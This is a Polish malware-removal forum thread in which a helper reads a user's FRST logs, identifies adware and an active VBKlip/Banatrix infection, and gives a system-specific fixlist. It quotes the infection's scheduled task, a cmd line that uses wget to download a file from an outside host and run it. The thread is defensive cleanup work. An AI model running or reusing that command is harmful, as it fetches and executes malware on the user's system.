xantyr Opublikowano 6 Stycznia 2015 Zgłoś Udostępnij Opublikowano 6 Stycznia 2015 Witam, otóż mam prośbę czy mógłby ktoś zajrzeć w te logi i powiedzieć czy jest coś do wyczyszczenia w tym pc, bo czasami antywirus wyrzuca mi, że coś jest nie tak ze skype. Addition.txt FRST.txt Shortcut.txt Extras.Txt OTL.Txt gmer.txt Odnośnik do komentarza
picasso Opublikowano 6 Stycznia 2015 Zgłoś Udostępnij Opublikowano 6 Stycznia 2015 Przeklej dokładnie z raportu antywirusa jak jest sformułowana detekcja (konkretna ścieżka dostępu i nazwa zagrożenia). Czy przypadkiem nie chodzi o folder SkypEmoticons? Taki widać w logu, jest to adware a nie część Skype. Natomiast w logach widać też inne odpadki adware oraz czynną infekcję - wariant VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań: Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp Przeprowadź następujące operacje: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction Task: {2AA368BC-A77B-47EB-9ABD-5CEC742BDC74} - System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi Task: {8DF6F1AC-6266-46C0-A0E5-736B5F75AC67} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp Task: {B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E} - System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7 Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com C:\Program Files\Probit Software C:\Program Files\unisaLees C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\17691939238860040889 C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol C:\ProgramData\APN C:\ProgramData\EpicScale C:\Users\Maciej\AppData\Roaming\Easeware C:\Users\Maciej\AppData\Roaming\SkypEmoticons EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Odnośnik do komentarza
xantyr Opublikowano 6 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 6 Stycznia 2015 Okej wykonałem wszystko. Fixlog.txt FRST.txt Odnośnik do komentarza
xantyr Opublikowano 7 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 Znów wyskakuje mi te skypemoticons Odnośnik do komentarza
picasso Opublikowano 7 Stycznia 2015 Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 Proszę zaprezentuj konkretnie gdzie. Mówiłam wcześniej: Przeklej dokładnie z raportu antywirusa jak jest sformułowana detekcja (konkretna ścieżka dostępu i nazwa zagrożenia). Odnośnik do komentarza
xantyr Opublikowano 7 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 Dokładnie to czasami wyświetla w Malwarebytes-anti malware. W procesie skype.exe Niestety nie wyskakuje to dość często, więc nie mam jak zrobić screena :f Odnośnik do komentarza
picasso Opublikowano 7 Stycznia 2015 Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 To raczej wskazuje na poprawny Skype a nie usunięty już folder SkypEmoticons. Skoro program to wyświetla, to i powinny być nagrane te dane w dziennikach programu - szukaj informacji tekstowej, by tu przekleić. Odnośnik do komentarza
xantyr Opublikowano 7 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 7 Stycznia 2015 Coś takiego Detection, 2015-01-07 15:56:28, SYSTEM, MACIEJ-KOMPUTER, Protection, Malicious Website Protection, IP, 213.55.112.88, 32045, Inbound, C:\Program Files\Skype\Phone\Skype.exe, Odnośnik do komentarza
picasso Opublikowano 8 Stycznia 2015 Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 Poprzednie zadania pomyślnie wykonane i w ostatnim raporcie FRST nie widać oznak infekcji. Na wszelki wypadek podaj jednak nowe raporty FRST (główny + Addition). To typ połączeń "Inbound", czyli przychodzące, co nie oznacza jeszcze infekcji w systemie tylko potencjalnie jej próbę / atak. Program blokuje i OK. Pytania: - Czy zgłoszenia MBAM tyczące Skype są związane z jakąś określoną czynnością w Skype? Przesył linków, otworzone konkretne okno? - W Skype: Narzędzia > Opcje > Zaawansowane > Zarządzaj dostępem innych programów do Skype > co widzisz na liście Kontroli dostępu API? IP 213.55.112.88 jest klasyfikowane jako "etiopskie": KLIK. IP pobierane u Ciebie z routera również jest z puli 213.x.x.x, ono jednak wskazuje adres polskiego providera: KLIK Tcpip\Parameters: [DhcpNameServer] 213.172.186.4 8.8.8.8 Dla absolutnej pewności mógłbyś przestawić w routerze adres Podstawowy, tzn. wprowadzić adresy Google 8.8.8.8 + 8.8.4.4. Podaj jeszcze odczyt z tego skanera: KLIK. Odnośnik do komentarza
xantyr Opublikowano 8 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 W opcjach skype nic nie jest dodane, na liście kontroli dostępu API niczego nie ma. Po skanie na stronie, którą dodałaś wyskakuje to: Jesteś bezpieczny. Interfejs administracyjny Twojego modemu jest niedostępny z Internetu. Odnośnik do komentarza
picasso Opublikowano 8 Stycznia 2015 Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 Miałeś podać jeszcze świeże logi FRST na wszelki wypadek. Odnośnik do komentarza
xantyr Opublikowano 8 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 Skan dodam za 30 minut edytując ten post. Niestety trochę dłużej zeszło, oto i logi. Addition.txt FRST.txt Odnośnik do komentarza
picasso Opublikowano 8 Stycznia 2015 Zgłoś Udostępnij Opublikowano 8 Stycznia 2015 1. W nowych raportach FRST nic nie widać, toteż kończymy w zakresie czyszczenia. Zastosuj DelFix i wyczyść foldery Przywracania systemu: KLIK. 2. Na wszelki wypadek wykonaj jeszcze to: Dla absolutnej pewności mógłbyś przestawić w routerze adres Podstawowy, tzn. wprowadzić adresy Google 8.8.8.8 + 8.8.4.4. Nie odpowiedziałeś mi na pytanie: Czy zgłoszenia MBAM tyczące Skype są związane z jakąś określoną czynnością w Skype? Przesył linków, otworzone konkretne okno? Odnośnik do komentarza
xantyr Opublikowano 9 Stycznia 2015 Autor Zgłoś Udostępnij Opublikowano 9 Stycznia 2015 Routeru nie mam, mam internet kablowy do pc podłączony modemem. Już nie wyskakują żadne okienka, użyłem delfix. Właśnie z niczym nie są związane, nie wyskakują żadne okienka. Odnośnik do komentarza
Rekomendowane odpowiedzi